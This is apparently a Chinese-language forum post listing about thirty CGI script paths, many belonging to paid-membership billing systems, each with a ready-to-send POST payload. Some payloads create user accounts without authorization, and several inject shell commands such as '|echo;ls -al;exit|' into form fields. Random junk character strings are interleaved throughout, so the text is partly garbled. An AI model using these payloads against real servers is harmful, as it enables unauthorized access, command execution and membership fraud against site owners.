Cgi-bin 30个漏洞＋使用方法

admin

==============================
- |* j/ E) g* \' P
+ z7 @( \) ?7 l/ W. c/smspass.pl
username=username&password=password

/index.cgi
wei=ren&gen=command
9 B( V2 g2 q0 Z2 ?: B' @& N8 a' M8 [
: r$ u# J0 N6 b1 L* _4 y/ q/passmaster.cgi
  G9 H$ b; b* j! Y  e1 ^* PAction=Add&Username=Username&Password=Password
) F7 Q; s( H2 V% e; W! N! N
/accountcreate.cgi
2 S5 a3 d6 G# ^1 ?% q' N% }7 Husername=username&password=password&ref1=|echo;ls|

  n# v- S, w1 \/form.cgi
9 O2 _" o/ f' s- }5 w4 Wname=xxxx&email=email&subject=xxxx&response=|echo;ls|
! `! z) V& Q( s0 b/ d# q( M! M7 m
/addusr.pl
$ z$ h2 n1 y  N9 T& w4 Y/cgi-bin/EuroDebit/addusr.pl
user=username&pass=Password&confirm=Password
2 V5 ^5 A, p) J0 ]7 g" `0 X/ i
/ccbill-local.asp
post_values=username:password
) ], k0 G  o/ {+ m; ~- \1 s0 |8 F) M
/count.cgi
- Y' I( k0 H& w# B# `pinfile=|echo;ls -la;exit|

/recon.cgi
/recon.cgi?search
searchoption=1&searchfor=|echo;ls -al;exit|
* m, n9 d3 N& S' k8 E. P, q5 ~3 J
/verotelrum.pl
vercode=username:password:dseegsow:add:amount<&30>
- ~2 j) F1 P: E9 a, G- x9 {* y9 s
- I# y7 e; h" `6 n, r* U/af.cgi
9 R$ P3 A5 B! G4 ?_browser_out=|echo;ls -la;exit;|

# F' T* ]6 N" [: R% ^/modify.cgi
username=username&password=password&expire=30

/openjournal.cgi
, N4 q$ ^( ^- o$ {$ b6 H$ h. l- Yedit=1&ct=2&go=|echo;ls -al;exit|
6 ?% q3 h* X6 {; T/ I5 t
/gx9passwd.cgi
+ g3 s: s% A. t/ \  v# e" u" x3 r0 icmd=ADD&user=username&pass=password
9 A: t3 ?( Y2 N
/probecontrol.cgi
command=enable&username=username&password=password
7 h$ Y  v, j, J# J8 T8 ]
# L5 w  c, \& q1 J) ?6 v/ R/recon.cgi
/ `1 T7 L# n9 V: ]6 [0 @$ psearchoption=3&searchfor=echo;ls -la;exit
9 h1 j* v3 q* h+ ?) J* W
. d$ L; X$ `8 O/htadd.pl
configfile=|echo; ls -alt; exit
6 p. J8 d0 X# T: g# K+ `
5 M' N3 o) r9 R" [# o1 ^/gx9passwd.cgi
+ }5 ?7 e1 K- t8 u4 C3 ?8 m8 Rcmd=ADD&user=username&pass=password
: g" L" \( u: Z! M
/ibill*.pl
" t- |9 {+ u4 Z( ~reqtype=add&authpwd=authpwd&username=username&password=password
6 R- O# e) Z7 z
* G7 A4 V2 \; d" z, R/cpay.cgi
' n( I9 f# i: Mcommand=add_member&username=username(EMAIL)&password=password(DES)
! x& {  J# P' m; A/ f* W
/ M0 d4 \9 }1 [4 t" ?/globill_ut.cgi
/ q0 b( w: Y5 q% a9 Z, T. t( Ddo=add&username=username&password=password&wpassword=password
6 j; s4 I* d' A5 Z% s- G% x
/ \/ ]0 m; r0 a8 a! w/usercontrol.cgi
command=enable&username=USER&password=PASS
$ _5 E# [) T) r8 K+ P
8 M$ v. q) {& ?6 J/globoSALErum.cgi
action=ADD&seccode=seccode&login=username&password=password

/addusr.pl
user=USER&pass=PASS&confirm=PASS
1 X3 w0 y( {' R' _: Z
/pincount.cgi
/cgi-bin/mastergate/pincount.cgi
pinfile=|echo;pwd;exit|

0 ^2 v; W+ u7 G! G5 ^/accountcreate.cgi
/cgi-bin/gateway/accountcreate.cgi
username=username&password=password&password2=password&ref1=|echo;ls -al;exit

# v$ g$ }# j- P  o# q/af.cgi
/env.cgi
# F1 w2 ^1 h5 g5 z! A7 OADD+;echo;pwd;exit

/count.cgi
pinfile=|echo;pwd;exit|

: h5 K) f: V5 ^, A6 _5 U* s) p/recon.cgi
searchoption=1&searchfor=|echo;ls%20-al;exit|

$ o/ m0 ~' |! D, m/ _9 H/add.cgi
' y9 T- v( z1 W0 o: c& Cusername=username&password=password&expire=30

==============================
9 f& m4 w1 T4 D* e" H7 o